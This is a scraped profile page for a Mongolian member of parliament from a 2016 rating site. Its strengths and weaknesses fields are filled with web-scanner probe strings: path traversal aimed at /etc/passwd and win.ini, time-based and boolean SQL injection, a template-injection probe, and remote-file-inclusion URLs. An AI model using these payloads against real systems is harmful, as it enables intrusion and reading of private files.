ТАНИЛЦУУЛГА   |   ЖУРАМ   |    МЭДЭЭЛЭЛ   САНАЛ АСУУЛГЫН ДҮН ГАРЛАА

ЭМЭГТЭЙ 50 АРДЫН ЭЛЧ


Санжаадорж Оюунбилэг

Төрсөн   1979
Төрсөн газар  
Үндэс угсаа  
ТАНИЛЦУУЛГА ТҮҮХЭН ЗАМНАЛ ОНЛАЙН МОНИТОРИНГ SWOT ХИЙСЭН АЖЛУУД
ДАВУУ ТАЛ /255 тэмдэгтэд багтаан бичнэ үү/ СУЛ ТАЛ /255 тэмдэгтэд багтаан бичнэ үү/
1. WEB-INF\web.xml
2. WEB-INF/web.xml
3. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
4. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
5. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
6. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
7. ..\..\..\..\..\..\..\..\windows\win.ini
8. ................windowswin.ini
9.
10. ../../../../../../../../../../windows/win.ini.jpg
11. ../../../../../../../../../../boot.ini
12. ../../../../../../../../../../windows/win.ini
13. WEB-INF\web.xml
14. /WEB-INF/web.xml
15. WEB-INF/web.xml
16. /\../\../\../\../\../\../\../etc/passwd
17. file:///etc/passwd
18. invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
19. ..
20. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
21. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
22. /.././.././.././.././.././.././.././../etc/./passwd%00
23. %2fetc%2fpasswd
24. /etc/passwd
25. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
26. /../..//../..//../..//../..//../..//etc/passwd.jpg
27. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
28. ../../../../../../../../../../etc/passwd.jpg
29. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
30. ../../../../../../../../../../../../../../../proc/version
31. ../../../../../../../../../../etc/passwd
32. {{10000228*10000222}}
33. CWS000x
34. acux2172
35. acu1617<s1﹥s2ʺs3ʹuca1617
36. 1anUftsR'));select pg_sleep(3); --
37. 1NfxR6FT');select pg_sleep(9); --
38. 1_9066
39. AODJOoB0';select pg_sleep(9); --
40. -1));select pg_sleep(9); --
41. 1'"()&%
42. -1);select pg_sleep(6); --
43. -1;select pg_sleep(6); --
44. 1
45. 1Gv2OdXd'; waitfor delay '0:0:6' --
46. 1 waitfor delay '0:0:3' --
47. -1); waitfor delay '0:0:3' --
48. -1; waitfor delay '0:0:3' --
49. (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
50. if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
51. -1" OR 2+201-201-1=0+0+0+1 --
52. 1
53. -1' OR 2+884-884-1=0+0+0+1 or 'cu4XFeug'='
54. -1' OR 2+17-17-1=0+0+0+1 --
55. 1
56. -1 OR 2+501-501-1=0+0+0+1
57. -1 OR 2+261-261-1=0+0+0+1 --
58. 1
59. hfPBQSzf
60. 1
61. 1
62. 1
63. (select convert(int,CHAR(65)))
64.
65.
66. JyI=
67. @@NJRDb
68. 1
69. \
70. 1'"
71. 1
72. 1
73. 1
74. 1
75. 1
76. 1
77. 1
78. testasp.vulnweb.com
79. 1
80. http://testasp.vulnweb.com/t/fit.txt?.jpg
81. Http://testasp.vulnweb.com/t/fit.txt
82. 1some_inexistent_file_with_long_name.jpg
83. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
84. ^(#$!@#$)(()))******
85. !(()&&!|*|*|
86. )
87. Array
88. 12345'"\'\");|]*{ <>
89.
90. 1
91. xGGpPJ5V
92. 1
93. 1
94. 1
95. 1
96. 1
97.
1. WEB-INF\web.xml
2. WEB-INF/web.xml
3. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
4. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
5. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
6. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
7. ..\..\..\..\..\..\..\..\windows\win.ini
8. ................windowswin.ini
9.
10. ../../../../../../../../../../windows/win.ini.jpg
11. ../../../../../../../../../../boot.ini
12. ../../../../../../../../../../windows/win.ini
13. WEB-INF\web.xml
14. /WEB-INF/web.xml
15. WEB-INF/web.xml
16. /\../\../\../\../\../\../\../etc/passwd
17. file:///etc/passwd
18. invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
19. ..
20. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
21. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
22. /.././.././.././.././.././.././.././../etc/./passwd%00
23. %2fetc%2fpasswd
24. /etc/passwd
25. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
26. /../..//../..//../..//../..//../..//etc/passwd.jpg
27. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
28. ../../../../../../../../../../etc/passwd.jpg
29. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
30. ../../../../../../../../../../../../../../../proc/version
31. ../../../../../../../../../../etc/passwd
32. b3h3fKy9'));select pg_sleep(8); --
33. zO5YCWyt');select pg_sleep(8); --
34. yjoMIfDk';select pg_sleep(4); --
35. -1));select pg_sleep(4); --
36. -1);select pg_sleep(4); --
37. -1;select pg_sleep(12); --
38. HU7YMabR'; waitfor delay '0:0:12' --
39. 1 waitfor delay '0:0:8' --
40. -1); waitfor delay '0:0:8' --
41. -1; waitfor delay '0:0:8' --
42. (select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
43. if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/
44. -1" OR 2+126-126-1=0+0+0+1 --
45. -1' OR 2+759-759-1=0+0+0+1 or 'auAEWry0'='
46. -1' OR 2+441-441-1=0+0+0+1 --
47. -1 OR 2+557-557-1=0+0+0+1
48. -1 OR 2+487-487-1=0+0+0+1 --
49. KRs3Xvb8
50. 1
51. 1
52. (select convert(int,CHAR(65)))
53.
54.
55. JyI=
56. @@SOBKa
57. 1
58. \
59. 1'"
60. 1
61. 1
62. testasp.vulnweb.com
63. http://testasp.vulnweb.com/t/fit.txt?.jpg
64. Http://testasp.vulnweb.com/t/fit.txt
65. 1some_inexistent_file_with_long_name.jpg
66. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
67. ^(#$!@#$)(()))******
68. !(()&&!|*|*|
69. )
70. Array
71. 12345'"\'\");|]*{ <>
72.
73. CJSviAqX
74. 1
75.

2016 АРДЫН ЭЛЧ РЕЙТИНГ ТОГТООХ СУДАЛГАА. iSss LLC Бүтээв.